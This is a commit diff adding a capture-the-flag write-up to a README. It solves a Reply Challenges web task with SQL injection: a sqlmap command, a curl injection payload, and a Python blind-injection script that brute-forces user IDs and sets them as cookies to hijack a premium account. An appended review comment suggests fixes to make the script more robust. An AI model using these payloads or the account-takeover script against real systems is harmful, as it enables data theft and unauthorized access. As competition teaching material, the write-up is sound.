Add reply-23 - The_Last_Fighting_Goat writeup
aenniw committed Nov 23, 2023
1 parent dfea681 commit 1cebb8d
Showing 1 changed file with 61 additions and 1 deletion.
62 changes: 61 additions & 1 deletion challenges.reply.com-23/The_Last_Fighting_Goat/README.md
Expand Up @@ -8,10 +8,70 @@ The palace of the Web Realm, a gleaming place called Hypercloud, is guarded by P

#### Solution:

- poking around the application revealed that one page have hidden form field
```html
<form hidden="true">
<input name="year">
</form>
```
- using it with `sqlmap -u "http://gamebox1.reply.it/web2-3c91477fb7fb643fc15d090da43cb634f20f0ed7/hof" --data "year=*" --random-agent --level 5 --risk 3 --dbs` reveals that there is SQL injection
- after long time digging and trying out different stuff we found that there is in the same table also `uid` column that could be leaked/guessed for the `top` players with `curl -vX POST 'http://gamebox1.reply.it/web2-3c91477fb7fb643fc15d090da43cb634f20f0ed7/hof' --data "year=' or (1=1 and year=2023 and name='humming_non-smoker2003' and uid like '2%')--"`

```python
import requests
import string

candidates = "abcdef" + string.digits + '-'

ses = requests.session()

r = ses.post(
"http://gamebox1.reply.it/web2-3c91477fb7fb643fc15d090da43cb634f20f0ed7/hof",
data={"year": "' or 1=1 --"}
)

names = []

for line in r.text.splitlines():
if '<td class="prize">' in line:
names.append(
line.split(">")[1].split("<")[0]
)

```bash
uuid = ""

for name in names:
while len(uuid) < 36:
for c in candidates:
r = ses.post(
f'http://gamebox1.reply.it/web2-3c91477fb7fb643fc15d090da43cb634f20f0ed7/hof',
data={"year": "' or (1=1 and name='" + name + "' and uid like '" + uuid + c + "%')--"})

listings = []
for line in r.text.splitlines():
if '<td class="prize">' in line:
listings.append(
line.split(">")[1].split("<")[0]
)

if len(listings) == 1 and name in r.text:
uuid = uuid + c
break

ses.cookies.set("UID", uuid, domain="gamebox1.reply.it")
r = ses.post(
"http://gamebox1.reply.it/web2-3c91477fb7fb643fc15d090da43cb634f20f0ed7/bets_history")

if "You need a premium account to use the feature" not in r.text:
print(name, uuid, "Premium")
break
else:
print(name, uuid)
uuid = ""
```

- now that we have `uid` of premium account we can just follow it's bid based on `bets_history` and earn the `prize`

---

<details><summary>FLAG:</summary>
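Review bot: the stray ```bash line between the `names.append(...)` loop and `uuid = ""` splits what is one Python script into two blocks, and since a closing fence may not carry an info string, the ```python block opened at `import requests` is never closed and the second half renders as shell. Drop that ```bash line so the whole script, from `import requests` to the final `uuid = ""`, sits inside a single ```python fence. In the same script, `while len(uuid) < 36:` has no exit when no candidate extends the prefix (a character outside `candidates`, or a change in the `<td class="prize">` markup the parser keys on), so it spins forever re-posting the same requests; add a `for ... else:` on the inner `for c in candidates:` loop that breaks out or raises when a full pass finds no match. The hard-coded `http://gamebox1.reply.it/web2-3c91477fb7fb643fc15d090da43cb634f20f0ed7/` URL also appears four times across the curl command and the script; a single `BASE` variable would make the writeup easier to reuse. Minor prose: "one page have hidden form field" should read "one page has a hidden form field", and "follow it's bid" should be "follow its bid".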